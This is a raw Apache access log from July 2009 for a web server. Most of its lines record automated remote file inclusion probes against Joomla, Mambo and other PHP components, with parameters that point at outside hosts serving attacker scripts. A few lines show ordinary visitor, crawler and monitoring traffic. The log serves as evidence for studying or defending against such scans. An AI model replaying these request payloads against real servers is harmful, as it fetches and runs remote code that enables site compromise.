59.22.140.17 - - [13/Jul/2009:04:02:26 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:04:02:26 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:02:51 -0400] "GET //index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:02:51 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:02:51 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:02:51 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:03:39 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jst.or.th/index1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:03:39 -0400] "GET /logs/access_log.Q109063000/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jst.or.th/index1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:03:39 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jst.or.th/index1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:04:10 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:04:35 -0400] "GET /logs/error_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:04:37 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:04:37 -0400] "GET /logs/?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 200 9324 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:04:38 -0400] "GET /?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:04:49 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:04:05:14 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:04:05:14 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9330 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:04:05:15 -0400] "GET /logs/error_log.Q109050800%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:05:17 -0400] "GET //skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:05:17 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:04:05:20 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
67.192.120.182 - - [13/Jul/2009:04:05:20 -0400] "GET /logs//login.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
67.192.120.182 - - [13/Jul/2009:04:05:21 -0400] "GET //login.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
67.192.120.182 - - [13/Jul/2009:04:05:22 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:04:05:22 -0400] "GET //login.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:04:05:22 -0400] "GET /logs//login.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:05:22 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:04:05:26 -0400] "GET /logs/access_log.Q109061700//login.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.105.207.244 - - [13/Jul/2009:04:05:30 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:05:39 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:05:57 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:05:57 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:05:57 -0400] "GET //index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:06:02 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:06:04 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:04:06:11 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:04:06:11 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
117.74.99.225 - - [13/Jul/2009:04:06:11 -0400] "GET //login.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
117.74.99.225 - - [13/Jul/2009:04:06:11 -0400] "GET /logs//login.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
117.74.99.225 - - [13/Jul/2009:04:06:14 -0400] "GET /logs/access_log.Q109061700//login.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
222.236.47.188 - - [13/Jul/2009:04:06:22 -0400] "GET /logs/error_log.Q109060600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:06:25 -0400] "GET /?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:06:25 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:06:25 -0400] "GET /logs/?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 200 9324 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:04:06:28 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:06:34 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:04:06:45 -0400] "GET /logs/access_log.Q109060800///vwar/backup/errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:04:06:46 -0400] "GET ///vwar/backup/errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:04:06:46 -0400] "GET /logs///vwar/backup/errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
67.192.120.182 - - [13/Jul/2009:04:06:51 -0400] "GET /logs/access_log.Q109061300%20%20//login.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:06:54 -0400] "GET /logs/access_log.Q109063000/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jst.or.th/index1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:06:54 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jst.or.th/index1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:06:54 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jst.or.th/index1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:04:06:57 -0400] "GET /logs/access_log.Q109052100///vwar/backup/errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
117.74.99.225 - - [13/Jul/2009:04:07:00 -0400] "GET //login.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:04:07:00 -0400] "GET /logs//login.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:04:07:00 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:04:07:00 -0400] "GET /logs/access_log.Q109061700%20%20//login.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:04:07:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.236.242.164 - - [13/Jul/2009:04:07:20 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:07:20 -0400] "GET //index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:07:20 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:07:23 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:07:39 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:07:39 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.252.82.118 - - [13/Jul/2009:04:08:31 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon; .NET CLR 2.0.50727)"
58.252.82.118 - - [13/Jul/2009:04:08:31 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon; .NET CLR 2.0.50727)"
58.252.82.118 - - [13/Jul/2009:04:08:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon; .NET CLR 2.0.50727)"
58.252.82.118 - - [13/Jul/2009:04:08:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon; .NET CLR 2.0.50727)"
200.105.207.244 - - [13/Jul/2009:04:09:25 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:09:30 -0400] "GET /logs/access_log.Q109063000%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jst.or.th/index1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:09:35 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:09:35 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
204.62.55.12 - - [13/Jul/2009:04:10:09 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64809 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
200.105.207.244 - - [13/Jul/2009:04:10:14 -0400] "GET /logs/access_log.Q109061900%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:04:10:27 -0400] "GET /logs/access_log.Q109061300%20%20//login.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:10:37 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:10:37 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:10:38 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:04:10:45 -0400] "GET /logs/access_log.Q109061700%20%20//login.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:11:25 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.169.189.169 - - [13/Jul/2009:04:11:28 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
211.236.242.164 - - [13/Jul/2009:04:11:37 -0400] "GET //index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.169.189.169 - - [13/Jul/2009:04:11:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1138D44F1BA40000841104J+M37+ENG HTTP/1.1" 200 36102 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
121.169.189.169 - - [13/Jul/2009:04:11:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138D44F1BA40000841104J+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
121.169.189.169 - - [13/Jul/2009:04:11:42 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1138D44719E4D00094C104J+M37+ENG HTTP/1.1" 200 37540 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138D44F1BA40000841104J+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
211.236.242.164 - - [13/Jul/2009:04:11:46 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.169.189.169 - - [13/Jul/2009:04:11:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1138D44D15A4F0009C3104J+M37+ENG HTTP/1.1" 200 76692 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138D44719E4D00094C104J+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
121.169.189.169 - - [13/Jul/2009:04:11:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138D44D15A4F0009C3104J+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
121.169.189.169 - - [13/Jul/2009:04:11:48 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1138D44F15B480009AF104J+M37+ENG HTTP/1.1" 200 48065 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
209.59.12.99 - - [13/Jul/2009:04:12:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.254.32.2 - - [13/Jul/2009:04:13:31 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:04:13:36 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:04:13:36 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:13:39 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:13:39 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:13:40 -0400] "GET /logs/error_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:13:41 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:13:56 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:14:00 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:14:08 -0400] "GET /logs/access_log.Q109061900//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:14:15 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:14:16 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://jst.or.th/index1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [13/Jul/2009:04:14:16 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.121.89.135 - - [13/Jul/2009:04:14:16 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.121.89.135 - - [13/Jul/2009:04:14:16 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
67.159.63.3 - - [13/Jul/2009:04:14:31 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.159.63.3 - - [13/Jul/2009:04:14:31 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.159.63.3 - - [13/Jul/2009:04:14:31 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:15:10 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:15:10 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:15:10 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:15:10 -0400] "GET /logs/error_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:15:48 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:15:48 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:15:48 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
67.159.63.3 - - [13/Jul/2009:04:16:14 -0400] "GET /logs/access_log.Q109061800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.206.120.187 - - [13/Jul/2009:04:16:24 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.206.120.187 - - [13/Jul/2009:04:16:24 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.206.120.187 - - [13/Jul/2009:04:16:24 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
